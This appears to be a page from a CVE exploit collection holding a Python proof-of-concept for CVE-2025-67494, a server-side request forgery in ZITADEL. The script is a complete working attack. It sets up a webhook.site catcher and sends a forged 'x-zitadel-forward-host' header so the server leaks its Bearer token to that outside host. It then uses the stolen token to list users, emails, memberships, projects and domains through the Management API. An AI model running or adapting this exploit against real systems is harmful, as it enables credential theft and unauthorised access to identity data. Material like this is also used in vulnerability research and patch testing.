4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
Exploit for CVE-2025-67494 - ZITADEL SSRF with automatic Bearer token retrieval
"""

import requests
import json
import argparse
import time
from urllib.parse import urlparse
from pwn import log

# JSON body sent with every POST request issued through api_request and with
# ZitadelAPI.get_user_memberships.
# NOTE(review): presumably asks for the first 10 results; "offset" is a string
# while "limit" is an int -- confirm against the Management API schema.
SEARCH_QUERY = {"query": {"offset": "0", "limit": 10}}

class WebhookManager:
    """Wrapper around a webhook.site endpoint used as a request catcher.

    Attributes are set by ``create``:
        token -- the ``uuid`` returned by webhook.site, or None
        url   -- ``https://webhook.site/<token>``, or None
    """

    def __init__(self):
        self.token = None
        self.url = None

    def create(self):
        """Request a new webhook.site token.

        Returns:
            ``(token, url)`` when the API answers 200/201 with a ``uuid``;
            ``(None, None)`` otherwise.

        NOTE(review): pwntools' ``log.error`` is documented to raise after
        logging; if so, a request failure propagates instead of returning
        ``(None, None)`` -- confirm.
        """
        try:
            reply = requests.post("https://webhook.site/token", timeout=10)
            if reply.status_code in (200, 201):
                uuid = reply.json().get('uuid')
                if uuid:
                    self.token = uuid
                    self.url = f"https://webhook.site/{uuid}"
                    return uuid, self.url
        except Exception as e:
            log.error(f"Error creating webhook: {e}")
        return None, None

    def get_requests(self, timeout=60):
        """Poll the webhook.site API until at least one request is recorded.

        Args:
            timeout: overall polling budget in seconds.

        Returns:
            The ``data`` list from the API response as soon as it is
            non-empty, or None when no token exists or the budget runs out.
        """
        if not self.token:
            return None

        endpoint = f"https://webhook.site/token/{self.token}/requests"
        poll_interval = 5
        seen_total = 0
        started = time.time()

        while time.time() - started < timeout:
            # Sampled once per iteration, before the HTTP round-trip.
            elapsed = time.time() - started
            try:
                reply = requests.get(endpoint, timeout=10)
                if reply.status_code == 200:
                    payload = reply.json()
                    total = payload.get('total', 0) if isinstance(payload, dict) else 0
                    # Only announce when the counter grew since the last poll.
                    if total > seen_total:
                        log.info(f"Webhook received {total} request(s)...")
                        seen_total = total

                    if payload and 'data' in payload and len(payload['data']) > 0:
                        return payload['data']

                remaining = int(timeout - elapsed)
                if remaining > 0 and remaining % 10 == 0 and elapsed > 5:
                    log.info(f"Waiting for SSRF request... ({remaining}s remaining)")
            except Exception as e:
                log.error(f"Error polling webhook: {e}")

            if elapsed < timeout:
                time.sleep(poll_interval)

        return None

    def extract_bearer_token(self, requests_data):
        """Return the first Bearer token found in the captured requests.

        Args:
            requests_data: iterable of request dicts, each optionally holding
                a ``headers`` mapping. Header values may be a string or a
                list of strings (only the first element is inspected).

        Returns:
            The token with the ``Bearer `` prefix removed, or None.
        """
        if not requests_data:
            return None

        prefix = 'Bearer '
        for captured in requests_data:
            header_map = captured.get('headers', {})
            if not header_map:
                continue

            for name, raw_value in header_map.items():
                if name.lower() != 'authorization':
                    continue
                candidate = raw_value
                if isinstance(candidate, list):
                    candidate = candidate[0] if candidate else ""
                if isinstance(candidate, str) and candidate.startswith(prefix):
                    return candidate[len(prefix):]
        return None

class SSRFExploiter:
    """Sends the single request that carries the forward-host header."""

    def __init__(self, target_url):
        self.target_url = target_url

    def exploit(self, oob_host):
        """GET ``<target_url>/ui/v2/login`` with ``x-zitadel-forward-host`` set.

        Args:
            oob_host: value placed in the ``x-zitadel-forward-host`` header.

        Returns:
            True when the request completed (any status code), False when it
            raised and the error logger returned.
        """
        log.info(f"Exploiting SSRF to {self.target_url}")
        log.info(f"OOB host: {oob_host}")

        login_url = f"{self.target_url}/ui/v2/login"
        forward_headers = {"x-zitadel-forward-host": oob_host}

        sent = False
        try:
            reply = requests.get(login_url, headers=forward_headers, timeout=30)
            log.success(f"SSRF request sent (status: {reply.status_code})")
            sent = True
        except Exception as e:
            log.error(f"Error during SSRF exploitation: {e}")
        return sent

def api_request(method="GET", endpoint="", error_msg=""):
    """Decorator factory for ZITADEL Management API calls.

    The decorated function's body is never executed: the wrapper replaces it
    with an HTTP call to ``<self.base_url>/management/v1/<endpoint>`` that is
    authenticated with ``self.token``.

    Args:
        method: ``"GET"`` issues a GET; any other value issues a POST. Only
            the exact value ``"POST"`` attaches ``SEARCH_QUERY`` as JSON body.
        endpoint: path appended after ``/management/v1/``.
        error_msg: prefix logged when the request raises; nothing is logged
            when it is empty.

    Returns:
        A decorator whose wrapper returns the decoded JSON body on HTTP 200
        and None otherwise.
    """
    # Local import keeps this block self-contained.
    import functools

    def decorator(func):
        # Preserve the decorated method's __name__/__doc__ for introspection.
        @functools.wraps(func)
        def wrapper(self, *args, **kwargs):
            url = f"{self.base_url}/management/v1/{endpoint}"
            headers = {"Authorization": f"Bearer {self.token}"}
            payload = SEARCH_QUERY if method == "POST" else None
            if payload:
                headers["Content-Type"] = "application/json"

            try:
                req_func = requests.get if method == "GET" else requests.post
                response = req_func(url, headers=headers, json=payload, timeout=10)
                if response.status_code == 200:
                    return response.json()
            except Exception as e:
                if error_msg:
                    log.error(f"{error_msg}: {e}")
            # Non-200 responses and handled errors both yield None.
            return None
        return wrapper
    return decorator

class ZitadelAPI:
    """Thin client for the ``/management/v1`` API of a ZITADEL instance.

    The decorated methods below have no body of their own: the ``api_request``
    wrapper performs the HTTP call and never invokes the decorated function.
    """

    def __init__(self, base_url, token):
        self.base_url = base_url
        self.token = token

    @api_request(method="GET", endpoint="iam", error_msg="Error retrieving IAM info")
    def get_iam_info(self):
        """GET ``iam``."""

    @api_request(method="GET", endpoint="orgs/me", error_msg="Error retrieving org info")
    def get_org_info(self):
        """GET ``orgs/me``."""

    @api_request(method="POST", endpoint="users/_search", error_msg="Error listing users")
    def list_users(self):
        """POST ``users/_search``."""

    @api_request(method="POST", endpoint="projects/_search", error_msg="Error listing projects")
    def list_projects(self):
        """POST ``projects/_search``."""

    @api_request(method="POST", endpoint="orgs/me/members/_search", error_msg="Error listing members")
    def list_org_members(self):
        """POST ``orgs/me/members/_search``."""

    @api_request(method="POST", endpoint="orgs/me/domains/_search", error_msg="Error listing domains")
    def list_org_domains(self):
        """POST ``orgs/me/domains/_search``."""

    def get_user_memberships(self, user_id):
        """POST ``users/<user_id>/memberships/_search`` with ``SEARCH_QUERY``."""
        return self._request(
            f"users/{user_id}/memberships/_search",
            method="POST",
            data=SEARCH_QUERY,
            error_msg="Error retrieving memberships",
        )

    def _request(self, endpoint, method="GET", data=None, error_msg=""):
        """Send one authenticated request to the Management API.

        Args:
            endpoint: path appended after ``/management/v1/``.
            method: ``"GET"`` issues a GET; any other value issues a POST.
            data: optional JSON body; when truthy a JSON content type is set.
            error_msg: prefix logged when the request raises.

        Returns:
            Decoded JSON on HTTP 200, otherwise None.
        """
        target = f"{self.base_url}/management/v1/{endpoint}"
        auth = {"Authorization": f"Bearer {self.token}"}
        request_headers = {**auth, "Content-Type": "application/json"} if data else auth

        try:
            send = requests.get if method == "GET" else requests.post
            reply = send(target, headers=request_headers, json=data, timeout=10)
            if reply.status_code == 200:
                return reply.json()
        except Exception as e:
            if error_msg:
                log.error(f"{error_msg}: {e}")
        return None

class DataFormatter:
    """Static helpers that turn Management API JSON into printable text.

    Every ``format_*`` method returns a string, or None when the input is
    empty or lacks the expected top-level key.
    """

    @staticmethod
    def _format_list(data, key='result', formatter=None):
        """Format each item of ``data[key]`` and join the results by newline.

        Args:
            data: mapping expected to contain ``key``.
            key: name of the list inside ``data``.
            formatter: callable applied once per item; items whose formatted
                value is falsy are dropped. Defaults to ``str`` when None.

        Returns:
            The joined lines, or None when there is nothing to show.
        """
        if not data or key not in data or not data[key]:
            return None
        render = formatter if formatter is not None else str
        # Format each item exactly once, then drop empty results.
        lines = [line for line in map(render, data[key]) if line]
        return "\n".join(lines) if lines else None

    @staticmethod
    def format_iam_info(data):
        """Render the ``globalOrgId``, ``iamProjectId`` and ``defaultOrgId`` fields."""
        if not data:
            return None
        gid = data.get('globalOrgId', 'N/A')
        pid = data.get('iamProjectId', 'N/A')
        did = data.get('defaultOrgId', 'N/A')
        return f"Global Org ID: {gid}\nIAM Project ID: {pid}\nDefault Org ID: {did}"

    @staticmethod
    def format_org_info(data):
        """Render id, name, state and primary domain of ``data['org']``."""
        if not data or 'org' not in data:
            return None
        org = data['org']
        oid = org.get('id', 'N/A')
        name = org.get('name', 'N/A')
        state = org.get('state', 'N/A')
        domain = org.get('primaryDomain', 'N/A')
        return f"ID: {oid}\nName: {name}\nState: {state}\nPrimary Domain: {domain}"

    @staticmethod
    def format_users(data):
        """Render one line per user: type, user name, optional email, state."""
        def fmt_user(user):
            # A user is labelled "Machine" only when it has a 'machine' key.
            user_type = "Machine" if 'machine' in user else "Human"
            username = user.get('userName', 'N/A')
            state = user.get('state', 'N/A')
            if 'human' in user and 'email' in user['human']:
                email = user['human']['email'].get('email', 'N/A')
                return f"{user_type}: {username} ({email}) - {state}"
            return f"{user_type}: {username} - {state}"
        return DataFormatter._format_list(data, 'result', fmt_user)

    @staticmethod
    def format_projects(data):
        """Render one line per project: name, id and state."""
        def fmt_project(project):
            return f"{project.get('name', 'N/A')} (ID: {project.get('id', 'N/A')}) - {project.get('state', 'N/A')}"
        return DataFormatter._format_list(data, 'result', fmt_project)

    @staticmethod
    def format_members(data):
        """Render one line per member: email and comma-separated roles."""
        def fmt_member(member):
            email = member.get('email', 'N/A')
            roles = ", ".join(member.get('roles', []))
            return f"{email} - Roles: {roles}"
        return DataFormatter._format_list(data, 'result', fmt_member)

    @staticmethod
    def format_domains(data):
        """Render one line per domain: name, verification flag, primary flag."""
        def fmt_domain(domain):
            domain_name = domain.get('domainName', 'N/A')
            verified = "Verified" if domain.get('isVerified') else "Not Verified"
            primary = "Primary" if domain.get('isPrimary') else ""
            # strip() removes the trailing space left when the domain is not primary.
            return f"{domain_name} - {verified} {primary}".strip()
        return DataFormatter._format_list(data, 'result', fmt_domain)

    @staticmethod
    def format_memberships(data):
        """Render one line per membership: IAM/Org tag, display name, roles."""
        def fmt_membership(membership):
            org_name = membership.get('displayName', 'N/A')
            roles = ", ".join(membership.get('roles', []))
            iam = "IAM" if membership.get('iam') else "Org"
            return f"{iam}: {org_name} - Roles: {roles}"
        return DataFormatter._format_list(data, 'result', fmt_membership)

def print_info(title, data, formatter=None):
    """Log a titled section for ``data``.

    Nothing is emitted when ``data`` is falsy. Otherwise a 60-character
    ``=`` banner and the title are logged, followed by either the formatter's
    output (logged only when truthy) or, without a formatter, the data
    pretty-printed as JSON on stdout.
    """
    if not data:
        return

    banner = '=' * 60
    log.info(f"\n{banner}")
    log.info(f"{title}")
    log.info(f"{banner}")

    if not formatter:
        print(json.dumps(data, indent=2, ensure_ascii=False))
        return

    rendered = formatter(data)
    if rendered:
        log.info(rendered)

def main():
    """Command-line entry point.

    Parses ``--ui-url``, ``--api-url`` and ``--timeout``, then runs the steps
    in order: create a webhook, send the request carrying the forward-host
    header, poll the webhook for a captured Bearer token, and print the
    results of several Management API queries made with that token.

    NOTE(review): none of the error branches below ``return``. pwntools'
    ``log.error`` is documented to raise after logging, which would make each
    of them abort the run; if a different logger is substituted, execution
    falls through (e.g. ``token[:50]`` on None) -- confirm.
    """
    parser = argparse.ArgumentParser(description="Exploit for CVE-2025-67494 - ZITADEL SSRF with automatic Bearer token retrieval")
    parser.add_argument('-u', '--ui-url', required=True, help='ZITADEL Login UI URL (e.g., http://localhost:29000)')
    parser.add_argument('-a', '--api-url', help='ZITADEL Management API URL (e.g., http://localhost:28080). If not provided, will be auto-detected from UI URL')
    parser.add_argument('--timeout', type=int, default=60, help='Timeout in seconds (default: 60)')
    args = parser.parse_args()
    
    ui_url = args.ui_url
    if args.api_url:
        base_url = args.api_url
    else:
        # Auto-detection: a UI on port 29000 maps to the same host on port
        # 28080; any other UI URL is reused as-is (scheme + netloc).
        parsed = urlparse(ui_url)
        base_url = f"{parsed.scheme}://{parsed.hostname}:28080" if parsed.port == 29000 else f"{parsed.scheme}://{parsed.netloc}"
    
    log.info("Starting CVE-2025-67494 exploit")
    log.info(f"UI URL: {ui_url}, API URL: {base_url}")
    
    webhook = WebhookManager()
    log.info("Creating webhook.site URL via API...")
    webhook_token, webhook_url = webhook.create()
    if not webhook_token:
        log.error("Failed to create webhook via API")
    
    # The webhook token is used as a subdomain of webhook.site.
    oob_host = f"{webhook_token}.webhook.site"
    log.success(f"Webhook created: {webhook_url}")
    log.info(f"OOB host: {oob_host}")
    
    exploiter = SSRFExploiter(ui_url)
    log.info("Sending SSRF request...")
    # The boolean result of exploit() is not checked; polling happens regardless.
    exploiter.exploit(oob_host)
    
    log.info(f"Polling webhook for Bearer token (timeout: {args.timeout}s)...")
    requests_data = webhook.get_requests(args.timeout)
    
    if not requests_data:
        log.error(f"Timeout: No requests received within {args.timeout} seconds")
    
    token = webhook.extract_bearer_token(requests_data)
    if not token:
        log.error("Bearer token not found in webhook requests")
    
    log.success("Bearer token successfully retrieved!")
    # Only the first 50 characters of the token are logged.
    log.info(f"Token: {token[:50]}...")
    log.info("Retrieving information via Management API...")
    
    api = ZitadelAPI(base_url, token)
    
    iam_info = api.get_iam_info()
    print_info("IAM Information", iam_info, DataFormatter.format_iam_info)
    
    org_info = api.get_org_info()
    print_info("Organization Information", org_info, DataFormatter.format_org_info)
    
    users = api.list_users()
    print_info("Users", users, DataFormatter.format_users)
    
    # Memberships are fetched only for the first user in the search result.
    if users and 'result' in users and len(users['result']) > 0:
        first_user_id = users['result'][0]['id']
        memberships = api.get_user_memberships(first_user_id)
        print_info(f"User Memberships (User ID: {first_user_id})", memberships, DataFormatter.format_memberships)
    
    projects = api.list_projects()
    print_info("Projects", projects, DataFormatter.format_projects)
    
    members = api.list_org_members()
    print_info("Organization Members", members, DataFormatter.format_members)
    
    domains = api.list_org_domains()
    print_info("Organization Domains", domains, DataFormatter.format_domains)
    
    log.success("Exploitation completed successfully!")

# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()